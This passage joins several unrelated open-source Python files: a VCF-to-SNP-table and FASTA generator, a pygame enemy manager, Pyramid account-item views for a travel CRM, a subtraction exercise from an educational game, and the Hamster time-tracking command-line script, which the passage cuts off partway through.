self.refgenome[chrom].seq[pos - 1] except KeyError: allele = self.refgenome[chrom].seq[pos - 1] self.fastas.setdefault(sample, {}).setdefault(chrom, {}).setdefault(pos, []).append(allele) # Track all alleles for each position try: if allele not in self.counts[chrom][pos]: self.counts.setdefault(chrom, {}).setdefault(pos, []).append(allele) except KeyError: self.counts.setdefault(chrom, {}).setdefault(pos, []).append(allele) def get_informative_snps(self): """SNPs position that have at least one different ALT allele within all the samples""" print ' Getting informative SNPs' # free up resources not needed anymore self.ac2s.clear() self.allac2.clear() self.finalac1.clear() # need to get the positions in the same order for all the sample (sort chrom and pos) for sample in self.fastas: for chrom in sorted(self.fastas[sample]): for pos in sorted(self.fastas[sample][chrom]): if len(self.counts[chrom][pos]) > 1: # if more that one ALT allele, keep it allele = ''.join(self.fastas[sample][chrom][pos]) # convert list to string # check if allele is empty if allele: self.informative_pos.setdefault(sample, {}).setdefault(chrom, {})\ .setdefault(pos, []).append(''.join(allele)) else: print "No allele infor for {}, {}:{}".format(sample, chrom, pos) def count_snps(self): print ' Counting SNPs' # free up resources not needed anymore self.counts.clear() # All samples should have the same number of informative SNPs # so any can be used to get the stats randomsample = random.choice(self.informative_pos.keys()) filteredcount = 0 informativecount = 0 # Account for multiple chromosome for chrom in self.fastas[randomsample]: filteredcount += len(self.fastas[randomsample][chrom]) # number of positions informativecount += len(self.informative_pos[randomsample][chrom]) # print to screen print "\nTotal filtered SNPs: {}".format(filteredcount) print "Total informative SNPs: {}\n".format(informativecount) # write to file fh = open(self.section4, "a") # append mode fh.write("Total filtered SNPs: 
{}\n".format(filteredcount)) fh.write("Total informative SNPs: {}\n\n".format(informativecount)) fh.close() def write_fasta(self): print ' Writing sample fasta files' # free up resources not needed anymore self.fastas.clear() # Create output folder for fasta files if not os.path.exists(self.output): os.makedirs(self.output) if isinstance(self.informative_pos, dict): for sample, chromosomes in sorted(self.informative_pos.iteritems()): samplepath = os.path.join(self.output, sample + '.fas') fh = open(samplepath, 'w') fh.write(">{}\n".format(sample)) if isinstance(chromosomes, dict): for chrom, positions in sorted(chromosomes.iteritems()): if isinstance(positions, dict): for pos, allele in sorted(positions.iteritems()): if isinstance(allele, list): fh.write(''.join(allele)) # convert list to text fh.write("\n") def write_root(self): print ' Writing root fasta file' rootpath = os.path.join(self.output, 'root.fas') randomsample = random.choice(self.informative_pos.keys()) rootseq = list() fh = open(rootpath, 'w') if isinstance(self.informative_pos, dict): for chrom in self.informative_pos[randomsample]: for pos in sorted(self.informative_pos[randomsample][chrom]): rootseq.append(self.refgenome[chrom].seq[pos - 1]) fh.write(">root\n" + "{}\n".format(''.join(rootseq))) def write_snp_table(self): print ' Writing SNP table' fh = open(self.table, 'w') randomsample = random.choice(self.informative_pos.keys()) ref_pos = list() ref_call = list() # reference if isinstance(self.informative_pos, dict): for chrom in self.informative_pos[randomsample]: for pos in sorted(self.informative_pos[randomsample][chrom]): ref_pos.append(''.join(chrom) + '-' + str(pos)) ref_call.append(self.refgenome[chrom].seq[pos - 1]) fh.write("reference_pos\t{}\n".format("\t".join(ref_pos))) fh.write("reference_call\t{}\n".format("\t".join(ref_call))) # sample if isinstance(self.informative_pos, dict): for sample, chromosomes in self.informative_pos.iteritems(): fh.write("{}".format(sample)) if 
isinstance(chromosomes, dict): for chrom, positions in sorted(chromosomes.iteritems()): if isinstance(positions, dict): for pos, allele in sorted(positions.iteritems()): if isinstance(allele, list): allele = ''.join(allele) # convert list to text fh.write("\t{}".format(allele)) fh.write("\n") fh.close() if __name__ == '__main__': from argparse import ArgumentParser parser = ArgumentParser(description='Generate SNP table and aligned fasta files from VCF files') parser.add_argument('-r', '--ref', metavar='ref.fasta', required=True, help='reference genome used in the VCF files') parser.add_argument('-v', '--vcf', metavar='vcfFolder', required=True, help='location of the VCF files') parser.add_argument('-q', '--minQUAL', metavar='minQUAL', type=int, required=True, help='minimum QUAL value in VCF file') parser.add_argument('-ac1', '--ac1', metavar='AC1Report.txt', required=True, help='output file where positions having both AC=1 and AC=2 are reported') parser.add_argument('-s4', '--section4', metavar='section4.txt', required=True, help='output file where total filtered SNP positions and total informative SNPs are reported') parser.add_argument('-o', '--output', metavar='fastaOutFolder', required=True, help='folder where the output fasta files will be output') parser.add_argument('-t', '--table', metavar='fastaTable.tsv', required=True, help='the SNP table') # Get the arguments into an object arguments = parser.parse_args() SnpTableMaker(arguments)
jcnix/abg
enemies.py
# -*- coding: utf-8 -*- # File: enemy.py # Author: Casey Jones # # Created on July 20, 2009, 4:48 PM # # This file is part of Alpha Beta Gamma (abg). # # ABG is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # ABG is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with ABG. If not, see <http://www.gnu.org/licenses/>. #class to handle all enemies on screen import sys, pygame, frametime, properties, random from enemy import Enemy class Enemies: enemies = [] blackSurface = pygame.Surface([Enemy.enemy.get_width(), Enemy.enemy.get_height()]) blackSurface.fill([0,0,0]) screen = None def set_screen(self, screen): self.screen = screen def create(self): #range that the current player ship can shoot where_spawn = random.randint(1, properties.width - Enemy.enemy.get_width()) lenemy = Enemy(where_spawn) self.enemies.append(lenemy) def move(self, bullet): to_update = [] if frametime.can_create_enemy(): self.create() to_delete = [] to_update += [x.enemyrect for x in self.enemies] if len(self.enemies) > 0: for i in range(len(self.enemies)): self.enemies[i].update(bullet) self.screen.blit(self.blackSurface, self.enemies[i].enemyrect) self.screen.blit(Enemy.enemy, self.enemies[i].enemyrect) #If enemy goes off the bottom of the screen if self.enemies[i].enemyrect.top > 800: to_delete.append(i) for x in to_delete: self.remove(x) to_update += [x.enemyrect for x in self.enemies] return to_update def getEnemies(self): return self.enemies def remove(self, index): try: to_update = self.enemies[index].enemyrect self.screen.blit(self.blackSurface, 
self.enemies[index].enemyrect) del self.enemies[index] return to_update except IndexError: print("IndexError for enemy {0} of {1}".format(index, len(self.enemies))) def game_over(self): for i in range(len(self.enemies)): self.screen.blit(self.blackSurface, self.enemies[i].enemyrect) del self.enemies[:]
mazvv/travelcrm
travelcrm/views/accounts_items.py
# -*-coding: utf-8-*- import logging from pyramid.view import view_config, view_defaults from pyramid.httpexceptions import HTTPFound from . import BaseView from ..models import DBSession from ..models.account_item import AccountItem from ..lib.bl.subscriptions import subscribe_resource from ..lib.utils.common_utils import translate as _ from ..forms.accounts_items import ( AccountItemForm, AccountItemSearchForm ) from ..lib.events.resources import ( ResourceCreated, ResourceChanged, ResourceDeleted, ) log = logging.getLogger(__name__) @view_defaults( context='..resources.accounts_items.AccountsItemsResource', ) class AccountsItemsView(BaseView): @view_config( request_method='GET', renderer='travelcrm:templates/accounts_items/index.mako', permission='view' ) def index(self): return { 'title': self._get_title(), } @view_config( name='list', xhr='True', request_method='POST', renderer='json', permission='view' ) def list(self): form = AccountItemSearchForm(self.request, self.context) form.validate() qb = form.submit() return qb.get_serialized() @view_config( name='view', request_method='GET', renderer='travelcrm:templates/accounts_items/form.mako', permission='view' ) def view(self): if self.request.params.get('rid'): resource_id = self.request.params.get('rid') account_item = AccountItem.by_resource_id(resource_id) return HTTPFound( location=self.request.resource_url( self.context, 'view', query={'id': account_item.id} ) ) result = self.edit() result.update({ 'title': self._get_title(_(u'View')), 'readonly': True, }) return result @view_config( name='add', request_method='GET', renderer='travelcrm:templates/accounts_items/form.mako', permission='add' ) def add(self): return { 'title': self._get_title(_(u'Add')), } @view_config( name='add', request_method='POST', renderer='json', permission='add' ) def _add(self): form = AccountItemForm(self.request) if form.validate(): account_item = form.submit() DBSession.add(account_item) DBSession.flush() event = 
ResourceCreated(self.request, account_item) event.registry() return { 'success_message': _(u'Saved'), 'response': account_item.id } else: return { 'error_message': _(u'Please, check errors'), 'errors': form.errors } @view_config( name='edit', request_method='GET', renderer='travelcrm:templates/accounts_items/form.mako', permission='edit' ) def edit(self): account_item = AccountItem.get(self.request.params.get('id')) return { 'item': account_item, 'title': self._get_title(_(u'Edit')), } @view_config( name='edit', request_method='POST', renderer='json', permission='edit' ) def _edit(self): account_item = AccountItem.get(self.request.params.get('id')) form = AccountItemForm(self.request) if form.validate(): form.submit(account_item) event = ResourceChanged(self.request, account_item) event.registry() return { 'success_message': _(u'Saved'), 'response': account_item.id } else: return { 'error_message': _(u'Please, check errors'), 'errors': form.errors } @view_config( name='copy', request_method='GET', renderer='travelcrm:templates/accounts_items/form.mako', permission='add' ) def copy(self): account_item = AccountItem.get_copy(self.request.params.get('id')) return { 'action': self.request.path_url, 'item': account_item, 'title': self._get_title(_(u'Copy')), } @view_config( name='copy', request_method='POST', renderer='json', permission='add' ) def _copy(self): return self._add() @view_config( name='delete', request_method='GET', renderer='travelcrm:templates/accounts_items/delete.mako', permission='delete' ) def delete(self): return { 'title': self._get_title(_(u'Delete')), 'rid': self.request.params.get('rid') } @view_config( name='delete', request_method='POST', renderer='json', permission='delete' ) def _delete(self): errors = False ids = self.request.params.getall('id') if ids: try: items = DBSession.query(AccountItem).filter( AccountItem.id.in_(ids) ) for item in items: DBSession.delete(item) event = ResourceDeleted(self.request, item) event.registry() 
DBSession.flush() except: errors=True DBSession.rollback() if errors: return { 'error_message': _( u'Some objects could not be delete' ), } return {'success_message': _(u'Deleted')} @view_config( name='subscribe', request_method='GET', renderer='travelcrm:templates/accounts_items/subscribe.mako', permission='view' ) def subscribe(self): return { 'id': self.request.params.get('id'), 'title': self._get_title(_(u'Subscribe')), } @view_config( name='subscribe', request_method='POST', renderer='json', permission='view' ) def _subscribe(self): ids = self.request.params.getall('id') for id in ids: account_item = AccountItem.get(id) subscribe_resource(self.request, account_item.resource) return { 'success_message': _(u'Subscribed'), }
OriHoch/pysiogame
game_boards/game070.py
# -*- coding: utf-8 -*- import classes.level_controller as lc import classes.game_driver as gd import classes.extras as ex import classes.board import random import pygame class Board(gd.BoardGame): def __init__(self, mainloop, speaker, config, screen_w, screen_h): self.level = lc.Level(self,mainloop,5,10) gd.BoardGame.__init__(self,mainloop,speaker,config,screen_w,screen_h,13,11) def create_game_objects(self, level = 1): self.board.decolorable = False self.board.draw_grid = False color = (234,218,225) self.color = color self.grey = (200,200,200) self.font_hl = (100,0,250) self.task_str_color = ex.hsv_to_rgb(200,200,230) self.activated_col = self.font_hl white = (255,255,255) self.bg_col = white self.top_line = 3#self.board.scale//2 if self.mainloop.scheme is not None: if self.mainloop.scheme.dark: self.bg_col = (0,0,0) self.level.games_per_lvl = 5 if self.level.lvl == 1: rngs = [20,50,10,19] self.level.games_per_lvl = 3 elif self.level.lvl == 2: rngs = [50,100,20,49] self.level.games_per_lvl = 3 elif self.level.lvl == 3: rngs = [100,250,50,99] self.level.games_per_lvl = 3 elif self.level.lvl == 4: rngs = [250,500,100,249] elif self.level.lvl == 5: rngs = [500,1000,100,499] elif self.level.lvl == 6: rngs = [700,1500,250,699] elif self.level.lvl == 7: rngs = [1500,2500,500,1499] elif self.level.lvl == 8: rngs = [2500,5000,1500,2499] elif self.level.lvl == 9: rngs = [5000,10000,2500,4999] elif self.level.lvl == 10: rngs = [10000,84999,5000,9999] data = [39,18] self.points = self.level.lvl #stretch width to fit the screen size x_count = self.get_x_count(data[1],even=None) if x_count > 39: data[0] = x_count self.data = data self.vis_buttons = [1,1,1,1,1,1,1,0,0] self.mainloop.info.hide_buttonsa(self.vis_buttons) self.layout.update_layout(data[0],data[1]) scale = self.layout.scale self.board.level_start(data[0],data[1],scale) self.n1 = random.randrange(rngs[0],rngs[1]) self.n2 = random.randrange(rngs[2],rngs[3]) self.sumn1n2 = self.n1-self.n2 self.n1s = str(self.n1) 
self.n2s = str(self.n2) self.sumn1n2s = str(self.sumn1n2) self.n1sl = len(self.n1s) self.n2sl = len(self.n2s) self.sumn1n2sl =len(self.sumn1n2s) self.cursor_pos = 0 self.correct = False self.carry1l = [] self.carry10l = [] self.resultl = [] self.nums1l = [] self.nums2l = [] self.ship_id = 0 self.digits = ["0","1","2","3","4","5","6","7","8","9"] if self.lang.lang == 'el': qm = ";" else: qm = "?" question = self.n1s + " - " + self.n2s + " = " + qm self.board.add_unit(1,0,data[0]-3-(max(self.n1sl,self.n2sl))*3 ,3,classes.board.Label,question,self.bg_col,"",21) self.board.units[-1].align = 1 #borrow 1 for i in range(self.n1sl - 1): self.board.add_unit(data[0]-6-i*3,0,1,1,classes.board.Label,"-",self.bg_col,"",0) self.board.add_unit(data[0]-5-i*3,0,1,1,classes.board.Letter,"",self.bg_col,"",1) self.carry1l.append(self.board.ships[-1]) self.carry1l[-1].set_outline(self.grey, 2) self.carry1l[-1].pos_id = i self.board.units[-1].align = 2 #add 10 for i in range(self.n1sl - 1): self.board.add_unit(data[0]-3-i*3,1,1,1,classes.board.Label,"+",self.bg_col,"",0) self.board.add_unit(data[0]-2-i*3,1,1,1,classes.board.Letter,"",self.bg_col,"",1) self.carry10l.append(self.board.ships[-1]) self.carry10l[-1].set_outline(self.grey, 2) self.carry10l[-1].pos_id = i self.board.units[-1].align = 2 self.board.add_unit(data[0]-2-self.n1sl*3,0,2,1,classes.board.Label,"-1",self.bg_col,"",0) self.board.add_unit(data[0]-2-self.n1sl*3,1,2,1,classes.board.Label,"+10",self.bg_col,"",0) #first number for i in range(self.n1sl): self.board.add_unit(data[0]-3-i*3,2,3,3,classes.board.Label,self.n1s[-(i+1)],self.bg_col,"",21) self.nums1l.append(self.board.units[-1]) self.nums1l[-1].font_color = self.grey self.nums1l[-1].pos_id = i #second number i = 0 for i in range(self.n2sl): self.board.add_unit(data[0]-3-i*3,5,3,3,classes.board.Label,self.n2s[-(i+1)],self.bg_col,"",21) self.nums2l.append(self.board.units[-1]) self.nums2l[-1].pos_id = i i += 1 
self.board.add_unit(data[0]-3-i*3,5,3,3,classes.board.Label,"-",self.bg_col,"",21) self.plus_label = self.board.units[-1] #line #line = "―" * (self.sumn1n2sl*2) self.board.add_unit(data[0]-self.sumn1n2sl*3,8,self.sumn1n2sl*3,1,classes.board.Label,"",self.bg_col,"",21) self.draw_hori_line(self.board.units[-1]) #self.board.units[-1].text_wrap = False #result for i in range(self.sumn1n2sl): self.board.add_unit(data[0]-3-i*3,9,3,3,classes.board.Letter,"",self.bg_col,"",21) self.resultl.append(self.board.ships[-1]) self.resultl[-1].set_outline(self.grey, 2) self.resultl[-1].pos_id = i self.resultl[0].set_outline(self.activated_col, 3) self.home_square = self.resultl[0] self.board.active_ship = self.home_square.unit_id self.activable_count = len(self.board.ships) for each in self.board.ships: each.immobilize() self.deactivate_colors() self.reactivate_colors() def draw_hori_line(self,unit): w = unit.grid_w*self.board.scale h = unit.grid_h*self.board.scale center = [w//2,h//2] canv = pygame.Surface([w, h-1]) canv.fill(self.bg_col) pygame.draw.line(canv,self.grey,(0,self.top_line),(w,self.top_line),3) unit.painting = canv.copy() unit.update_me = True def handle(self,event): gd.BoardGame.handle(self, event) #send event handling up if self.show_msg == False: if event.type == pygame.KEYDOWN and event.key == pygame.K_LEFT: self.home_sqare_switch(self.board.active_ship+1) elif event.type == pygame.KEYDOWN and event.key == pygame.K_RIGHT: self.home_sqare_switch(self.board.active_ship-1) elif event.type == pygame.KEYDOWN and event.key == pygame.K_UP: if self.home_square in self.resultl: self.home_sqare_switch(self.board.active_ship-self.n1sl+1) elif self.home_square in self.carry10l: self.home_sqare_switch(self.board.active_ship-self.n1sl+1) elif event.type == pygame.KEYDOWN and event.key == pygame.K_DOWN: self.home_sqare_switch(self.board.active_ship+self.n1sl-1) elif event.type == pygame.KEYDOWN and event.key != pygame.K_RETURN and not self.correct: lhv = 
len(self.home_square.value) self.changed_since_check = True if event.key == pygame.K_BACKSPACE: if lhv > 0: self.home_square.value = self.home_square.value[0:lhv-1] else: char = event.unicode if (len(char)>0 and lhv < 3 and char in self.digits): if self.home_square in self.resultl: if lhv == 1: s = self.home_square.value + char if s[0] == "0": self.home_square.value = char else: n = int(s) if n < 20: self.home_square.value = str(n % 10) else: self.home_square.value = char else: self.home_square.value = char elif self.home_square in self.carry1l: if char == "1": self.home_square.value = "1" self.carry10l[self.home_square.pos_id].value = "10" else: self.home_square.value = "" self.carry10l[self.home_square.pos_id].value = "" self.carry10l[self.home_square.pos_id].update_me = True elif self.home_square in self.carry10l: if lhv == 0: if char == "1": self.home_square.value = "10" elif lhv == 1: if char == "0": self.home_square.value = "10" else: self.home_square.value = "" else: if char == "1": self.home_square.value = "10" else: self.home_square.value = "" if self.home_square.value == "10": self.carry1l[self.home_square.pos_id].value = "1" else: self.carry1l[self.home_square.pos_id].value = "" self.carry1l[self.home_square.pos_id].update_me = True self.home_square.update_me = True self.mainloop.redraw_needed[0] = True elif event.type == pygame.MOUSEBUTTONUP: self.home_sqare_switch(self.board.active_ship) def home_sqare_switch(self, activate): if activate < 0 or activate > self.activable_count: activate = self.activable_count - self.sumn1n2sl if activate >= 0 and activate < self.activable_count: self.board.active_ship = activate self.home_square.update_me = True if self.board.active_ship >= 0: self.home_square.set_outline(self.grey, 2) self.deactivate_colors() self.home_square = self.board.ships[self.board.active_ship] self.home_square.set_outline(self.activated_col, 3) self.reactivate_colors() self.home_square.font_color = self.font_hl self.home_square.update_me = True 
self.mainloop.redraw_needed[0] = True def deactivate_colors(self): for each in self.board.ships: each.font_color = self.grey each.update_me = True for each in self.board.units: each.font_color = self.grey each.update_me = True def reactivate_colors(self): self.plus_label.font_color = self.font_hl self.board.units[0].font_color = self.task_str_color if self.home_square in self.carry1l: self.carry10l[self.home_square.pos_id].font_color = self.font_hl elif self.home_square in self.carry10l: self.carry1l[self.home_square.pos_id].font_color = self.font_hl elif self.home_square in self.resultl: if self.home_square.pos_id > 0: self.carry1l[self.home_square.pos_id-1].font_color = self.font_hl if self.home_square.pos_id >= 0 and self.home_square.pos_id < self.n1sl-1: self.carry10l[self.home_square.pos_id].font_color = self.font_hl if (self.n1sl > self.home_square.pos_id): self.nums1l[self.home_square.pos_id].font_color = self.font_hl if (self.n2sl > self.home_square.pos_id): self.nums2l[self.home_square.pos_id].font_color = self.font_hl self.resultl[self.home_square.pos_id].font_color = self.font_hl def update(self,game): game.fill(self.color) gd.BoardGame.update(self, game) #rest of painting done by parent def check_result(self): s = "" for each in reversed(self.resultl): s += each.value if s == self.sumn1n2s: self.update_score(self.points) self.level.next_board() else: if self.points > 0: self.points -= 1 self.level.try_again()
projecthamster/hamster
src/hamster-cli.py
#!/usr/bin/env python3 # - coding: utf-8 - # Copyright (C) 2010 Matías Ribecky <matias at mribecky.com.ar> # Copyright (C) 2010-2012 Toms Bauģis <toms.baugis@gmail.com> # Copyright (C) 2012 Ted Smith <tedks at cs.umd.edu> # This file is part of Project Hamster. # Project Hamster is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # Project Hamster is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # You should have received a copy of the GNU General Public License # along with Project Hamster. If not, see <http://www.gnu.org/licenses/>. '''A script to control the applet from the command line.''' import sys, os import argparse import re import gi gi.require_version('Gdk', '3.0') # noqa: E402 gi.require_version('Gtk', '3.0') # noqa: E402 from gi.repository import GLib as glib from gi.repository import Gdk as gdk from gi.repository import Gtk as gtk from gi.repository import Gio as gio from gi.repository import GLib as glib import hamster from hamster import client, reports from hamster import logger as hamster_logger from hamster.about import About from hamster.edit_activity import CustomFactController from hamster.overview import Overview from hamster.preferences import PreferencesEditor from hamster.lib import default_logger, stuff from hamster.lib import datetime as dt from hamster.lib.fact import Fact logger = default_logger(__file__) def word_wrap(line, max_len): """primitive word wrapper""" lines = [] cur_line, cur_len = "", 0 for word in line.split(): if len("%s %s" % (cur_line, word)) < max_len: cur_line = ("%s %s" % (cur_line, word)).strip() else: if cur_line: lines.append(cur_line) cur_line = word if 
cur_line: lines.append(cur_line) return lines def fact_dict(fact_data, with_date): fact = {} if with_date: fmt = '%Y-%m-%d %H:%M' else: fmt = '%H:%M' fact['start'] = fact_data.start_time.strftime(fmt) if fact_data.end_time: fact['end'] = fact_data.end_time.strftime(fmt) else: end_date = dt.datetime.now() fact['end'] = '' fact['duration'] = fact_data.delta.format() fact['activity'] = fact_data.activity fact['category'] = fact_data.category if fact_data.tags: fact['tags'] = ' '.join('#%s' % tag for tag in fact_data.tags) else: fact['tags'] = '' fact['description'] = fact_data.description return fact class Hamster(gtk.Application): """Hamster gui. Actions should eventually be accessible via Gio.DBusActionGroup with the 'org.gnome.Hamster.GUI' id. but that is still experimental, the actions API is subject to change. Discussion with "external" developers welcome ! The separate dbus org.gnome.Hamster.WindowServer is still the stable recommended way to show windows for now. """ def __init__(self): # inactivity_timeout: How long (ms) the service should stay alive # after all windows have been closed. gtk.Application.__init__(self, application_id="org.gnome.Hamster.GUI", #inactivity_timeout=10000, register_session=True) self.about_controller = None # 'about' window controller self.fact_controller = None # fact window controller self.overview_controller = None # overview window controller self.preferences_controller = None # settings window controller self.connect("startup", self.on_startup) self.connect("activate", self.on_activate) # we need them before the startup phase # so register/activate_action work before the app is ran. # cf. 
https://gitlab.gnome.org/GNOME/glib/blob/master/gio/tests/gapplication-example-actions.c self.add_actions() def add_actions(self): # most actions have no parameters # for type "i", use Variant.new_int32() and .get_int32() to pack/unpack for name in ("about", "add", "clone", "edit", "overview", "preferences"): data_type = glib.VariantType("i") if name in ("edit", "clone") else None action = gio.SimpleAction.new(name, data_type) action.connect("activate", self.on_activate_window) self.add_action(action) action = gio.SimpleAction.new("quit", None) action.connect("activate", self.on_activate_quit) self.add_action(action) def on_activate(self, data=None): logger.debug("activate") if not self.get_windows(): self.activate_action("overview") def on_activate_window(self, action=None, data=None): self._open_window(action.get_name(), data) def on_activate_quit(self, data=None): self.on_activate_quit() def on_startup(self, data=None): logger.debug("startup") # Must be the same as application_id. Won't be required with gtk4. glib.set_prgname(self.get_application_id()) # localized name, but let's keep it simple. glib.set_application_name("Hamster") def _open_window(self, name, data=None): logger.debug("opening '{}'".format(name)) if name == "about": if not self.about_controller: # silence warning "GtkDialog mapped without a transient parent" # https://stackoverflow.com/a/38408127/3565696 _dummy = gtk.Window() self.about_controller = About(parent=_dummy) logger.debug("new About") controller = self.about_controller elif name in ("add", "clone", "edit"): if self.fact_controller: # Something is already going on, with other arguments, present it. # Or should we just discard the forgotten one ? logger.warning("Fact controller already active. 
Please close first.") else: fact_id = data.get_int32() if data else None self.fact_controller = CustomFactController(name, fact_id=fact_id) logger.debug("new CustomFactController") controller = self.fact_controller elif name == "overview": if not self.overview_controller: self.overview_controller = Overview() logger.debug("new Overview") controller = self.overview_controller elif name == "preferences": if not self.preferences_controller: self.preferences_controller = PreferencesEditor() logger.debug("new PreferencesEditor") controller = self.preferences_controller window = controller.window if window not in self.get_windows(): self.add_window(window) logger.debug("window added") # Essential for positioning on wayland. # This should also select the correct window type if unset yet. # https://specifications.freedesktop.org/wm-spec/wm-spec-1.3.html if name != "overview" and self.overview_controller: window.set_transient_for(self.overview_controller.window) # so the dialog appears on top of the transient-for: window.set_type_hint(gdk.WindowTypeHint.DIALOG) else: # toplevel window.set_transient_for(None) controller.present() logger.debug("window presented") def present_fact_controller(self, action, fact_id=0): """Present the fact controller window to add, clone or edit a fact. Args: action (str): "add", "clone" or "edit" """ assert action in ("add", "clone", "edit") if action in ("clone", "edit"): action_data = glib.Variant.new_int32(int(fact_id)) else: action_data = None # always open dialogs through actions, # both for consistency, and to reduce the paths to test. 
app.activate_action(action, action_data) class HamsterCli(object): """Command line interface.""" def __init__(self): self.storage = client.Storage() def assist(self, *args): assist_command = args[0] if args else "" if assist_command == "start": hamster_client._activities(sys.argv[-1]) elif assist_command == "export": formats = "html tsv xml ical".split() chosen = sys.argv[-1] formats = [f for f in formats if not chosen or f.startswith(chosen)] print("\n".join(formats)) def toggle(self): self.storage.toggle() def start(self, *args): '''Start a new activity.''' if not args: print("Error: please specify activity") return 0 fact = Fact.parse(" ".join(args), range_pos="tail") if fact.start_time is None: fact.start_time = dt.datetime.now() self.storage.check_fact(fact, default_day=dt.hday.today()) id_ = self.storage.add_fact(fact) return id_ def stop(self, *args): '''Stop tracking the current activity.''' self.storage.stop_tracking() def export(self, *args): args = args or [] export_format, start_time, end_time = "html", None, None if args: export_format = args[0] (start_time, end_time), __ = dt.Range.parse(" ".join(args[1:])) start_time = start_time or dt.datetime.combine(dt.date.today(), dt.time()) end_time = end_time or start_time.replace(hour=23, minute=59, second=59) facts = self.storage.get_facts(start_time, end_time) writer = reports.simple(facts, start_time.date(), end_time.date(), export_format) def _activities(self, search=""): '''Print the names of all the activities.''' if "@" in search: activity, category = search.split("@") for cat in self.storage.get_categories(): if not category or cat['name'].lower().startswith(category.lower()): print("{}@{}".format(activity, cat['name'])) else: for activity in self.storage.get_activities(search): print(activity['name']) if activity['category']: print("{}@{}".format(activity['name'], activity['category'])) def activities(self, *args): '''Print the names of all the activities.''' search = args[0] if args else "" for 
activity in self.storage.get_activities(search): print("{}@{}".format(activity['name'], activity['category'])) def categories(self, *args): '''Print the names of all the categories.''' for category in self.storage.get_categories(): print(category['name']) def list(self, *times): """list facts within a date range""" (start_time, end_time), __ = dt.Range.parse(" ".join(times or [])) start_time = start_time or dt.datetime.combine(dt.date.today(), dt.time()) end_time = end_time or start_time.replace(hour=23, minute=59, second=59) self._list(start_time, end_time) def current(self, *args): """prints current activity. kinda minimal right now""" facts = self.storage.get_todays_facts() if facts and not facts[-1].end_time: print("{} {}".format(str(facts[-1]).strip(), facts[-1].delta.format(fmt="HH:MM"))) else: print((_("No activity"))) def search(self, *args): """search for activities by name and optionally within a date range""" args = args or [] search = "" if args: search = args[0] (start_time, end_time), __ = dt.Range.parse(" ".join(args[1:])) start_time = start_time or dt.datetime.combine(dt.date.today(), dt.time()) end_time = end_time or start_time.replace(hour=23, minute=59, second=59) self._list(start_time, end_time, search) def _list(self, start_time, end_time, search=""): """Print a listing of activities""" facts = self.storage.get_facts(start_time, end_time, search) headers = {'activity': _("Activity"), 'category': _("Category"), 'tags': _("Tags"), 'description': _("Description"), 'start': _("Start"), 'end': _("End"), 'duration': _("Duration")} # print date if it is not the same day print_with_date = start_time.date() != end_time.date() cols = 'start', 'end', 'duration', 'activity', 'category' widths = dict([(col, len(headers[col])) for col in cols]) for fact in facts: fact = fact_dict(fact, print_with_date) for col in cols: widths[col] = max(widths[col], len(fact[col])) cols = ["{{{col}: <{len}}}".format(col=col, len=widths[col]) for col in cols] fact_line = " | 
".join(cols) row_width = sum(val + 3 for val in list(widths.values())) print() print(fact_line.format(**headers)) print("-" * min(row_width, 80)) by_cat = {} for fact in facts: cat = fact.category or _("Unsorted") by_cat.setdefault(cat, dt.timedelta(0)) by_cat[cat] += fact.delta pretty_fact = fact_dict(fact, print_with_date) print(fact_line.format(**pretty_fact)) if pretty_fact['description']: for line in word_wrap(pretty_fact['description'], 76): print(" {}".format(line)) if pretty_fact['tags']: for line in word_wrap(pretty_fact['tags'], 76): print(" {}".format(line)) print("-" * min(row_width, 80)) cats = [] total_duration = dt.timedelta() for cat, duration in sorted(by_cat.items(), key=lambda x: x[1], reverse=True): cats.append("{}: {}".format(cat, duration.format())) total_duration += duration for line in word_wrap(", ".join(cats), 80): print(line) print("Total: ", total_duration.format()) print() def version(self): print(hamster.__version__) if __name__ == '__main__': from hamster.lib import i18n i18n.setup_i18n() usage = _( """ Actions: * add [activity [start-time [end-time]]]: Add an activity * stop: Stop tracking current activity. * list [start-date [end-date]]: List activities * search [terms] [start-date [end-date]]: List activities matching a search term * export [html|tsv|ical|xml] [start-date [end-date]]: Export activities with the specified format * current: Print current activity * activities: List all the activities names, one per line. * categories: List all the categories names, one per line. * overview / preferences / add / about: launch specific window * version: Show the Hamster version Time formats: * 'YYYY-MM-DD hh:mm': If start-date is missing, it will default to today. If end-date is missing, it will default to start-date. * '-minutes': Relative time in minutes from the current date and time. Note: * For list/search/export a "hamster day" starts at the time set in the preferences (default 05:00) and ends one minute earlier the next day. 
Activities are reported for each "hamster day" in the interval. Example usage: hamster start bananas -20 start activity 'bananas' with start time 20 minutes ago hamster search pancakes 2012-08-01 2012-08-30 look for an activity matching terms 'pancakes` between 1st and 30st August 2012. Will check against activity, category, description and tags """) hamster_client = HamsterCli() app = Hamster() logger.debug("app instanciated") import signal signal.signal(signal.SIGINT, signal.SIG_DFL) # gtk3 screws up ctrl+c parser = argparse.ArgumentParser( description="Time tracking utility", epilog=usage, formatter_class=argparse.RawDescriptionHelpFormatter) # cf. https://stackoverflow.com/a/28611921/3565696 parser.add_argument("--log", dest="log_level", choices=('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'), default='WARNING', help="Set the logging level (default: %(default)s)") parser.add_argument("action", nargs="?", default="overview") parser.add_argument('action_args', nargs=argparse.REMAINDER, default=[]) args, unknown_args = parser.parse_known_args() # logger for current script logger.setLevel(args.log_level) # hamster_logger for the rest hamster_logger.setLevel(args.log_level) if not hamster.installed: logger.info("Running in devel mode") if args.action in ("start", "track"): action = "add" # alias elif args.action == "prefs": # for backward compatibility action = "preferences" else: action = args.action if action in ("about", "add", "edit", "overview", "preferences"): if action == "add" and args.action_args: assert not unknown_args, "unknown options: {}".format(unknown_args) # directly add fact from arguments id_ = hamster_client.start(*args.action_args) assert id_ > 0, "failed to add fact" sys.exit(0) else: app.register() if action == "edit": assert len(args.action_args) == 1, ( "edit requires exactly one argument, got {}" .format(args.action_args)) id_ = int(args.action_args[0]) assert id_ > 0, "received non-positive id : {}".format(id_) action_data = 
